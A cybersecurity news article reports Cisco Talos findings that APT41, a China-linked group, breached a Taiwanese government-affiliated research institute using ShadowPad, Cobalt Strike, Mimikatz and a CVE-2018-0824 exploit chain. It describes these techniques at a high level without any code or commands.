A Taiwanese government-affiliated research institute specializing in computing and related technologies has been compromised by a nation-state threat actor with ties to China, according to new findings from Cisco Talos.
The organization, whose name has not been released, was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-exploitation tools, including ShadowPad and Cobalt Strike, which are estimated with medium confidence to be the work of an active hacking group tracked as APT41.
“The ShadowPad malware used in the current campaign exploits an old, vulnerable version of the Microsoft Office IME binary as a loader, which then loads a customized second-stage loader to launch the payload,” said security researchers Joey Chen, Ashley Shen and Vitor Ventura.
“The threat actors were able to compromise three hosts within the target environment and successfully exfiltrate several documents from the network.”
Cisco Talos said it discovered the activity in August 2023 after detecting “anomalous PowerShell commands” that connected to IP addresses to download and execute PowerShell scripts within compromised environments.
The exact initial access vector used in the attack is unknown, but it uses web shells to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered by a Go-based Cobalt Strike loader called CS-Avoid-Killing.
“The Cobalt Strike malware was developed with an anti-AV loader to evade AV detection and avoid isolation from security products,” the researchers said.
Alternatively, threat actors have been observed executing PowerShell commands to launch scripts that run ShadowPad in memory to retrieve Cobalt Strike malware from compromised command and control (C2) servers. The DLL-based ShadowPad loader (also known as ScatterBee) is executed via DLL side-loading.
Other steps taken as part of the intrusion included using Mimikatz to extract passwords and running several commands to gather information about user accounts, directory structures, and network configurations.
“APT41 created a customized loader that injects a proof-of-concept for CVE-2018-0824 directly into memory to exploit a remote code execution vulnerability and achieve local privilege escalation,” Talos said, noting that the final payload, UnmarshalPwn, is unleashed after going through three distinct stages.
The cybersecurity organization also noted that the attackers are attempting to evade detection by ceasing their own activity if they detect other users on the system. “Once the backdoor is deployed, malicious actors will remove the web shell and guest accounts that granted them the initial access,” the researchers said.
The revelation comes after Germany revealed earlier this week that Chinese state actors had carried out a cyberattack in 2021 against the country’s national mapping agency, the Federal Office of Mapping and Geodesy (BKG), for espionage purposes.
The Chinese embassy in Berlin said the allegations were baseless and called on Germany to “stop using cybersecurity issues to smear China politically and media.”
